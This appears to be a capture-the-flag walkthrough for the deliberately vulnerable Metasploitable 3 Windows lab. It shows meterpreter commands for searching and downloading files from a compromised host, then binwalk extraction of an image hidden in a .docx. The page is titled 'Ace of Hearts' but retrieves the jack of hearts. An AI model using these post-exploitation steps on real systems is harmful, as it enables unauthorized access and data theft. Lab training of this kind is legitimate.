---
title: Ace of Hearts
description: Metasploitable 3 Windows - Ace of Hearts
extends: _layouts.documentation
section: content
---

# Ace of Hearts

1\. Setup a meterpreter shell on the target system by following the same exploit used in the [King of Diamonds Walkthrough](/walkthroughs/metasploitable-3-windows/king-of-diamonds/).

2\. Search for flags from the root C: directory, you'll see a lot of flags. The one we're interested in right now is the ace_of_hearts.jpg
```bash
meterpreter > search -f *_of_* ./
Found 61 results...
    ...plenty of results...
    c:\Program Files\OpenSSH\home\Public\Documents\jack_of_hearts.docx (676796 bytes)
   ...even more results...
```

3\. Download the jack of hearts.
```bash
meterpreter > cd OpenSSH/home/Public/Documents
meterpreter > ls
Listing: C:\Program Files\OpenSSH\home\Public\Documents
=======================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2009-07-14 05:06:44 +0000  My Music
40777/rwxrwxrwx   0       dir   2009-07-14 05:06:44 +0000  My Pictures
40777/rwxrwxrwx   0       dir   2009-07-14 05:06:44 +0000  My Videos
100666/rw-rw-rw-  278     fil   2009-07-14 04:57:55 +0000  desktop.ini
100666/rw-rw-rw-  676796  fil   2019-06-02 09:36:20 +0000  jack_of_hearts.docx
100666/rw-rw-rw-  505608  fil   2019-06-02 09:36:20 +0000  seven_of_spades.pdf

meterpreter > download jack_of_hearts.docx
[*] Downloading: jack_of_hearts.docx -> jack_of_hearts.docx
[*] Downloaded 660.93 KiB of 660.93 KiB (100.0%): jack_of_hearts.docx -> jack_of_hearts.docx
[*] download   : jack_of_hearts.docx -> jack_of_hearts.docx
```

4\. Exit your meterpreter session by sending it to the background
```bash
meterpreter > background
[*] Backgrounding session 1...
```

> Tip: You can list your sessions with background -l and connect back to that session with sessions <session-id>

5\. Inspect the .docx file with binwalk.
```bash
msf5 exploit(multi/http/jenkins_script_console) > ls
[*] exec: ls

docker-compose.yaml
jack_of_hearts.docx
msf5 exploit(multi/http/jenkins_script_console) > binwalk jack_of_hearts.docx
[*] exec: binwalk jack_of_hearts.docx


DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Zip archive data, at least v2.0 to extract, name: docProps/
39            0x27            Zip archive data, at least v2.0 to extract, compressed size: 448, uncompressed size: 978, name: docProps/app.xml
533           0x215           Zip archive data, at least v2.0 to extract, compressed size: 394, uncompressed size: 802, name: docProps/core.xml
974           0x3CE           Zip archive data, at least v2.0 to extract, name: word/
1009          0x3F1           Zip archive data, at least v2.0 to extract, compressed size: 1109, uncompressed size: 3175, name: word/document.xml
2165          0x875           Zip archive data, at least v2.0 to extract, compressed size: 443, uncompressed size: 1261, name: word/fontTable.xml
2656          0xA60           Zip archive data, at least v2.0 to extract, name: word/media/
2697          0xA89           Zip archive data, at least v2.0 to extract, compressed size: 97218, uncompressed size: 97394, name: word/media/image1.png
99966         0x1867E         Zip archive data, at least v1.0 to extract, compressed size: 566998, uncompressed size: 566998, name: word/media/jack_of_hearts.png
667023        0xA2D8F         Zip archive data, at least v2.0 to extract, compressed size: 932, uncompressed size: 2518, name: word/settings.xml
668002        0xA3162         Zip archive data, at least v2.0 to extract, compressed size: 3889, uncompressed size: 44241, name: word/styles.xml
671936        0xA40C0         Zip archive data, at least v2.0 to extract, name: word/theme/
671977        0xA40E9         Zip archive data, at least v2.0 to extract, compressed size: 1517, uncompressed size: 6795, name: word/theme/theme1.xml
673545        0xA4709         Zip archive data, at least v2.0 to extract, compressed size: 259, uncompressed size: 497, name: word/webSettings.xml
673854        0xA483E         Zip archive data, at least v2.0 to extract, name: word/_rels/
673895        0xA4867         Zip archive data, at least v2.0 to extract, compressed size: 256, uncompressed size: 949, name: word/_rels/document.xml.rels
674209        0xA49A1         Zip archive data, at least v2.0 to extract, compressed size: 346, uncompressed size: 1362, name: [Content_Types].xml
674604        0xA4B2C         Zip archive data, at least v2.0 to extract, name: _rels/
674640        0xA4B50         Zip archive data, at least v2.0 to extract, compressed size: 233, uncompressed size: 590, name: _rels/.rels
676774        0xA53A6         End of Zip archive, footer length: 22
```

6\. The .docx file looks like it's being used as a zip archive. 
You can see the jack_of_hearts.png file in the word/media directory.
```bash
msf5 exploit(multi/http/jenkins_script_console) > binwalk -e jack_of_hearts.docx
[*] exec: binwalk -e jack_of_hearts.docx


DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Zip archive data, at least v2.0 to extract, name: docProps/
39            0x27            Zip archive data, at least v2.0 to extract, compressed size: 448, uncompressed size: 978, name: docProps/app.xml
533           0x215           Zip archive data, at least v2.0 to extract, compressed size: 394, uncompressed size: 802, name: docProps/core.xml
974           0x3CE           Zip archive data, at least v2.0 to extract, name: word/
1009          0x3F1           Zip archive data, at least v2.0 to extract, compressed size: 1109, uncompressed size: 3175, name: word/document.xml
2165          0x875           Zip archive data, at least v2.0 to extract, compressed size: 443, uncompressed size: 1261, name: word/fontTable.xml
2656          0xA60           Zip archive data, at least v2.0 to extract, name: word/media/
2697          0xA89           Zip archive data, at least v2.0 to extract, compressed size: 97218, uncompressed size: 97394, name: word/media/image1.png
99966         0x1867E         Zip archive data, at least v1.0 to extract, compressed size: 566998, uncompressed size: 566998, name: word/media/jack_of_hearts.png
667023        0xA2D8F         Zip archive data, at least v2.0 to extract, compressed size: 932, uncompressed size: 2518, name: word/settings.xml
668002        0xA3162         Zip archive data, at least v2.0 to extract, compressed size: 3889, uncompressed size: 44241, name: word/styles.xml
671936        0xA40C0         Zip archive data, at least v2.0 to extract, name: word/theme/
671977        0xA40E9         Zip archive data, at least v2.0 to extract, compressed size: 1517, uncompressed size: 6795, name: word/theme/theme1.xml
673545        0xA4709         Zip archive data, at least v2.0 to extract, compressed size: 259, uncompressed size: 497, name: word/webSettings.xml
673854        0xA483E         Zip archive data, at least v2.0 to extract, name: word/_rels/
673895        0xA4867         Zip archive data, at least v2.0 to extract, compressed size: 256, uncompressed size: 949, name: word/_rels/document.xml.rels
674209        0xA49A1         Zip archive data, at least v2.0 to extract, compressed size: 346, uncompressed size: 1362, name: [Content_Types].xml
674604        0xA4B2C         Zip archive data, at least v2.0 to extract, name: _rels/
674640        0xA4B50         Zip archive data, at least v2.0 to extract, compressed size: 233, uncompressed size: 590, name: _rels/.rels
676774        0xA53A6         End of Zip archive, footer length: 22
```

7\. From your local computer, copy down the file from you kali instance.
```bash
$ scp -i ../hacker-lab hacker-lab@165.227.4.18:/home/hacker-lab/_jack_of_hearts.docx.extracted/word/media/jack_of_hearts.png ./
Enter passphrase for key '../hacker-lab':
jack_of_hearts.png
```

8\. And another flag!

<img src="/assets/images/walkthroughs/metasploitable-3-windows/jack-of-hearts/jack_of_hearts.png">